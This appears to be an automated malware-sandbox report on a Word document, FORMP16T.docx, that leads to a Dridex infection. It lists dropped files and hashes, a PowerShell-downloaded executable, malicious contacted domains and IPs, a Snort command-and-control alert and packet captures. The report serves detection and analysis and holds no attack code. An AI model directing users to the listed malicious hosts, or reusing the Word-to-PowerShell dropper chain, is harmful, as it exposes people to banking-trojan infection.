C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{384E1BD3-7400-470C-B3DC-F5038CCAA836}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	2560
Entropy (8bit):	2.5735364382363324
Encrypted:	false
MD5:	39D6429B4FA6E4A3EB57EEDFA48792B7
SHA1:	5BA01408169FEEF05041B3E305D779DCB6292E0C
SHA-256:	73134D23D9D1080C982412ED04A29EFD7C7F14F0B67E23F420CA6781BA25ABDF
SHA-512:	25FB4CFF0BFF1ABD7178D614FBD2B022DB16A5528013FA3DCD49C6BD12139F69EECFD031DA2E61CAB629C71D0B4364CE3DB6EC159191BBC6A7B392155BCF977B
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F01E0AB-1877-4309-9FF2-E450448C9908}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B0F4FAC3-A519-4D8E-8AA8-C8135F37FD86}.tmp
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1536
Entropy (8bit):	2.6737149006886534
Encrypted:	false
MD5:	D9449E562F822B38BEC7E815175C54E8
SHA1:	CBFAE6FC61B8F880CB3A4FCCB4D05F35198CDBDE
SHA-256:	E0CF56CE9C83B47A100050383853E592521CCCD7CD93833397274CA308FE1F4B
SHA-512:	FA577955335A21286C5FE782865F49D169B6FB411F77510FC48628FD392F8855C7EB3AD691D1E0F9E83F221F727602756F14BA807B5B1B130691E793A0FBC38D
Malicious:	false

C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	270387
Entropy (8bit):	7.404283344284438
Encrypted:	false
MD5:	A5EB363D44116B6CECB2AA7527FD7A6A
SHA1:	3D43576AAB02A16970A5717453D81F978A686119
SHA-256:	492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
SHA-512:	87462A0DFA8D58849CE2D06BE3374C199FE943341CFFB34870698252EA93978EFEC5E016A78AF9432794F821B3837C009EB15C86F7A6EC5118F5E1F87B63583C
Malicious:	true
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: log.exe, Detection: malicious, Browse Filename: FORMP16T.docx, Detection: malicious, Browse

C:\Users\user\AppData\Local\Temp\{3D2CEBA6-A347-4CB9-83D7-058FF2ED1EAA}
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	137348
Entropy (8bit):	0.05952738608421197
Encrypted:	false
MD5:	5D859794480AFB30484C8C21FCA69A25
SHA1:	117E4A1FA9986C8597A80C2FE4CE776B294FBD19
SHA-256:	072A5188F96A0E48DE5B6D850FED17C1231E0777C0F0593714F1846731FE3AA5
SHA-512:	91EC29284224D3B95E9C8A2BD46AFACE90F34358A000CCDCC0F6775A148C54E2445E67972B7B5A4625B98993846C4E799CC1781D6736A23157EFE94B33BE8B0E
Malicious:	false

C:\Users\user\AppData\Local\Temp\{4C7EFF2B-DE41-4635-9BB9-3053B2B6A867}
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	137348
Entropy (8bit):	0.05953988760186431
Encrypted:	false
MD5:	BB7F76B62D1FE392E35D95CE409ABB75
SHA1:	4C04F6F83CC9D966BFADC598F9D5C5C8A7C0CCD2
SHA-256:	8AFF0069A4F9AFC0C25214EEB164FE0AAD0588A5161DBDFA0560B8DB85653DB5
SHA-512:	AF21B27EFDD838CEB5B237A2441CAFF522043C5CBF5F7671F644CE4EC700189768DC2EF8623B52C39C12354DF6346E1E5821F4B1B0730C32F45527E3970B8625
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FORMP16T.LNK
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut
Size (bytes):	2056
Entropy (8bit):	4.541608860559977
Encrypted:	false
MD5:	F8B14C4BC4D447089B61D1718D02155E
SHA1:	6E62D20FF058319D34A03BDEB4463A6C565ABAB7
SHA-256:	5EFD9C639C906AB5B0D720573A892FB4F833BA570883F1FC6CDA41F52CE2F3B9
SHA-512:	95A55C685DC2C489BD031689495361F5D19DCFC093A8B15E74EFCE01A952641E30010B2DC4172B2CAAEEE064B891A615206C2262981C5576DE73737AE7E13B44
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\cypruscars4u.com.url
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=< >)
Size (bytes):	50
Entropy (8bit):	4.5034651896016475
Encrypted:	false
MD5:	9DFC09DD1BC19A7212ABB9B9B93D4D3E
SHA1:	080D8B2EA51C0DF333F2A2C5EAA6F0017F3B8F5B
SHA-256:	085EFF9EDDF8AEC945C551A43B5CD5197410B6E4A335539E902E922E10F190E5
SHA-512:	29C836F2980A95F38690421AA8E2C675B9B644CEC787382D4B3554AB98E722D69DC5DA2DDF0449487A740323D0A1A7A22F44BDFFCABFE2A876920EA204A6A915
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	127
Entropy (8bit):	4.94445432505334
Encrypted:	false
MD5:	E681C1C28E712F4111D737CD758E4895
SHA1:	DFA0180894A8E10119324FDEDC242CC50D466E67
SHA-256:	BDB856964CF83E7C2F39FA3BAB4FC1DFA559B2050C771C105C173AF80928A971
SHA-512:	DA1BAF0D6DC57FB9FC8937C2053125A08CFAC8436B1ED8328C4A976EF09E33BBE06B9F8E6C017893D23482BF4B9BDB76E32F238DD086F3F61D7D387DBA800814
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\logo.jpg.url
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=< >)
Size (bytes):	58
Entropy (8bit):	4.654973451837617
Encrypted:	false
MD5:	042B9ADE4DDDCAEDA19952D8E956D29F
SHA1:	EA3F7A76BC24EDF1B83BD49EC13C25E33ECECAFA
SHA-256:	99F8893F0ADC5741DC60BE43A749B325537F0CEB1DE065AF493BFCCF8C8E0E0E
SHA-512:	A6B92D96A6B054587A09A5679F22025937BE169394BE3715C84503BB8A3E8487F4CAF1ECB4487E7515EF06F2BE28DE97EC0AF596FCA1A9FBA5D7A767B1D6EBBD
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.9833602514795796
Encrypted:	false
MD5:	0385F897CB2FDFF5D96731D517AEECEC
SHA1:	41C7F3DC326798CB343DF2018CB4579CAA3D49DB
SHA-256:	AA5050FC25F8609280944F388E93E42CE810CEA051791168C88E595036AABA5F
SHA-512:	DF081C7E98B807C4F0813DB9ECCFB567EF556555194B7F9F0606D0C25EFAEB0D89FDCDF9BE21CB69592C46ECD4E1B389E7F7DE4C2F2FFC8EBF7E91642E77FDC6
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R89YL6WT7152KKXNY024.temp
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Size (bytes):	8016
Entropy (8bit):	3.5523474608905365
Encrypted:	false
MD5:	B6E4720900797B26D62677FDD493F8DF
SHA1:	DAA4A9E483A0504FDFF1490142F68E9F2DD5A192
SHA-256:	6BDB4BB6AF85E9617CBDA0141F5CAE837D5873D17D28380D942A1EF30CF1AD82
SHA-512:	7B64F6CD45A8F0BA20CF9D1558DA42A88557E4A93C906208C45A5D5EEA46820E5E5DBC19D86784A763107207657EEAE9E7ED4878081409264E86B89374D322C4
Malicious:	false

C:\Users\user\AppData\Roaming\freenet\FAQ
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	data
Size (bytes):	96
Entropy (8bit):	2.952623008146999
Encrypted:	false
MD5:	E682DB375DD0780AFCDC3A38FC134EDD
SHA1:	5C585B9531B5B80D5602AFAF82826EC6664CD8F6
SHA-256:	CE1DB85A7011056A0B9F88576A6A445BA3C87D207D9204C26AFAFE8310CE0B56
SHA-512:	297686F70E3C2015025BCE10A4E4131842B03B8D2574F029AEAE1328BBFFFFAF71EB49D68B9DC546EC435EE46E6D979D15C2CEFE89FC3E3D2495D1CBC62B3EC4
Malicious:	false

C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	data
Size (bytes):	87216
Entropy (8bit):	7.99816202635642
Encrypted:	true
MD5:	B3A9D059584418A2A0803FB0C6753EA9
SHA1:	D19EF63CCEF78C785CBDE5008FBFE7721625D02F
SHA-256:	70DCCAA8296D3101E33F952EB2A927A21F428786F1F8DB724EAF918408E348CF
SHA-512:	51C13E5D6C91341A158A40D746E929433B78F39BE48B3705D3E0B172CDCFDE677B008F58FC938C06AE93D8157008D28ED3C662811A720DC42E203FAB34A9D2DC
Malicious:	true

C:\Users\user\AppData\Roaming\freenet\README.md
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	data
Size (bytes):	16
Entropy (8bit):	2.091917186688699
Encrypted:	false
MD5:	6181181AF3D12FFB94B78A3EE28FEAE3
SHA1:	5095813630D7FB87A1A26D71C21E635E551A3A8D
SHA-256:	1B8D81C6864285856EE18FAB3DC48CF610E8B6DADB8EDC1EC08EABC0DFA168E4
SHA-512:	02F1591E216E9ACEF2873996E4164DBC20B2059A0AB70AF0E592B888D145DBCCCBB0D7799170ECE00A2C1DF940DFA7105150D7F834EBD06230DF99557A5CFA5D
Malicious:	false

C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
Process:	C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
File Type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):	270387
Entropy (8bit):	7.404283344284438
Encrypted:	false
MD5:	A5EB363D44116B6CECB2AA7527FD7A6A
SHA1:	3D43576AAB02A16970A5717453D81F978A686119
SHA-256:	492AAF70E95987373A3C01F6AFA10C9F064D756871D6B02D7F65E03E70E92AC9
SHA-512:	87462A0DFA8D58849CE2D06BE3374C199FE943341CFFB34870698252EA93978EFEC5E016A78AF9432794F821B3837C009EB15C86F7A6EC5118F5E1F87B63583C
Malicious:	true
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: log.exe, Detection: malicious, Browse Filename: FORMP16T.docx, Detection: malicious, Browse

C:\Users\user\Desktop\~$RMP16T.docx
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162
Entropy (8bit):	2.9833602514795796
Encrypted:	false
MD5:	0385F897CB2FDFF5D96731D517AEECEC
SHA1:	41C7F3DC326798CB343DF2018CB4579CAA3D49DB
SHA-256:	AA5050FC25F8609280944F388E93E42CE810CEA051791168C88E595036AABA5F
SHA-512:	DF081C7E98B807C4F0813DB9ECCFB567EF556555194B7F9F0606D0C25EFAEB0D89FDCDF9BE21CB69592C46ECD4E1B389E7F7DE4C2F2FFC8EBF7E91642E77FDC6
Malicious:	false

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	Microsoft Cabinet archive data, 53748 bytes, 1 file
Size (bytes):	107496
Entropy (8bit):	7.995311414574702
Encrypted:	true
MD5:	EA03AEEAA3343AF083EC6A40717AA4FB
SHA1:	39622FBE41944B9817E27AD579173C135E41988B
SHA-256:	5B41FA5F62A5D6270F93D5BAC8C670BA692A75F3195F382514E984236CE20CE5
SHA-512:	2303583F9324A3D1C924FF8A767DB114F50A4DFB986784AB049740FF5917BAFC029EC7947FAC750722EA40AAF4B8C20930D6EFC29D94324478AEE30025E36E99
Malicious:	false

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	data
Size (bytes):	660
Entropy (8bit):	3.1295797772172023
Encrypted:	false
MD5:	0BA9F563F21686E45482384C5691EE0E
SHA1:	B6BFC818E8F99FE87D4BEA105D1E25EA3D99E964
SHA-256:	7E03515CFB42D3EB16716D46C718A98CEAE50A26D02876896E7669BE6BA0D277
SHA-512:	F35B31E8DA1818CF5F533E0BF838F9359AFA5FA0A97187F926D577405E816E175375BAA1914C3F8FE2F825A05E848E6A94AD921A86C49FEFECBB0D61245FEB15
Malicious:	false

C:\Windows\Temp\VBB688.tmp
Process:	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
File Type:	CDF V2 Document, corrupt: Cannot read summary info
Size (bytes):	32768
Entropy (8bit):	7.103203419688449
Encrypted:	false
MD5:	B8AFD98281FF1377DA72ACF8E8FB09A0
SHA1:	E08D2C5659A68BA73E727EFE4DED3FCE59A249E2
SHA-256:	CC68ED6421653E63A8196F8D4BD9F45D0EF478E658578756A55E49F35ECB20C2
SHA-512:	58781843D1E0322BA12A3AA5786EF4936CE5CD4BD1D25BF32D91E223D5FF228DDBFE5A6840940B51B328F4E8788DB461E8F9CF50FF6F74D3B2E1E338271BD2FC
Malicious:	false

\DAV RPC SERVICE
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	GLS_BINARY_LSB_FIRST
Size (bytes):	232
Entropy (8bit):	4.20940736384572
Encrypted:	false
MD5:	7422EDFA6EAF21D37BAA922C7E2AF23A
SHA1:	4E5B4B594F76A4D0CEFC53723AB1742EA03BA711
SHA-256:	0C27F934457C6F03E5B424EF7115D641F487631B3D4DCDE4748BFD553C98A25B
SHA-512:	42438BE36AAACE63C160EA698FA23DEBA73D0D73841933ADB5A77A59C00CA7F565D772B8934AB0A4F305F1DFE2E1C72EB00A0EC3B2C8186D09BBF6F4F3F41FD0
Malicious:	false

\OfficeUser_1f3d3cf5-9984-4ee7-99f2-d3c9e5b287fa
Process:	C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE
File Type:	data
Size (bytes):	168
Entropy (8bit):	1.6178682016203876
Encrypted:	false
MD5:	C09D374C573BE8800E2E8B6604E31859
SHA1:	E4E109C3F99096372377138A75014AE425E66383
SHA-256:	5EF6F02E6761B7DEFAC05000E439052421063FD59377EAC554FD712399A22E64
SHA-512:	8B0346195FD4DB46F89EB5F8E383993322F4B25B13BC3D81CAE6EA466ED4678B79637241065097B2AADAFC3D40D1C25F03C3D922D677F830A5C14A4800DD2CB0
Malicious:	false

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
figs4u.co.uk	87.247.241.143	true	true	low
ipinfo.io	216.239.34.21	true	false	high
cypruscars4u.com	87.247.241.143	true	true	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
92.55.251.211	Poland	42739	FONE-ASNPL	true
87.247.241.143	United Kingdom	57173	GOSIS-ASFR	true
216.239.34.21	United States	15169	GOOGLE-GoogleIncUS	false
82.202.221.37	Russian Federation	49505	SELECTELRU	true

Private

IP

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.595189609687529
TrID:	Word Microsoft Office Open XML Format document (41004/1) 91.10% ZIP compressed archive (4004/1) 8.90%
File name:	FORMP16T.docx
File size:	34438
MD5:	70162476205496513fd88e9069372e53
SHA1:	a8a1438d1c6f7720f2fe5083519f5a53ac01ffcc
SHA256:	a372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3
SHA512:	747e78c23e81028e9d201f908e568352e92d450f185f3ed6448d4a5acbc8f356544cf39ab430f580ec0557cb532e5fd5674c230fb49fe5bdd2e4af446662dd84
File Content Preview:	PK..........!..A.._...........docProps/app.xml ...(............................................................................................................................................................................................................

File Icon

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/25/18-16:09:19.249706	TCP	2021013	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)	447	49197	82.202.221.37	192.168.1.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mai 25, 2018 16:04:03.729567051 MESZ	56975	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:04.004415035 MESZ	53	56975	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:04.094546080 MESZ	49188	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:04.094609976 MESZ	80	49188	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:04.094686031 MESZ	49188	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:04.095504999 MESZ	49188	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:04.095530033 MESZ	80	49188	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:04.198158979 MESZ	80	49188	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:04.198348045 MESZ	49188	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:04.917773008 MESZ	51208	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:05.048067093 MESZ	53	51208	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:05.056689978 MESZ	62228	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:05.186736107 MESZ	53	62228	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:05.189137936 MESZ	49189	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:05.189234972 MESZ	80	49189	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:05.189368010 MESZ	49189	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:05.189836979 MESZ	49189	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:05.189867973 MESZ	80	49189	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:05.301259041 MESZ	80	49189	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:05.503052950 MESZ	80	49189	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:05.503177881 MESZ	49189	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:09.196559906 MESZ	80	49188	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:09.196705103 MESZ	49188	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:10.307883024 MESZ	80	49189	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:10.308038950 MESZ	49189	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:10.537914038 MESZ	49189	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:10.537981987 MESZ	80	49189	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.249743938 MESZ	58659	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:14.400018930 MESZ	53	58659	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:14.404015064 MESZ	56917	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:14.562123060 MESZ	53	56917	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:14.562791109 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.562834978 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.562949896 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.563160896 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.563179016 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.686031103 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.687855959 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.687895060 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.754057884 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.758125067 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.758160114 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.821834087 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.823277950 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.823313951 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.905404091 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.912440062 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.912480116 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.987792015 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:14.989383936 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:14.989419937 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.065145969 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.266997099 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.267302990 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.342600107 MESZ	49188	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.342675924 MESZ	80	49188	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.344258070 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.344302893 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.347111940 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.348134995 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.348161936 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.444607019 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.444644928 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.444658995 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.444705009 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.444871902 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.445514917 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.445602894 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.447355986 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.447390079 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.447398901 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.447443008 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.447880983 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.456495047 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.456512928 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.456527948 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.456608057 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.457494020 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.457568884 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.459269047 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.459289074 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.459379911 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.468738079 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468759060 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468770027 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468846083 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468853951 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.468858957 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468867064 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468878984 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.468895912 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.469127893 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.471623898 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471643925 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471657038 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471702099 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.471724033 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471740007 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471750021 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471759081 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471795082 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471801996 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.471817017 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.471975088 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.473071098 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.481856108 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.481888056 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.481909037 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.481965065 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.482001066 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482039928 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482053995 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482070923 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482115984 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.482135057 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482153893 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482168913 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482182026 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482249022 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.482259035 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482270956 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482280016 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482295036 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.482346058 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.483432055 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.484572887 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.484591007 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.484689951 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.484889984 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.525974035 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.526122093 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.546453953 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:15.546511889 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.652585030 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:15.652676105 MESZ	49191	80	192.168.1.16	87.247.241.143
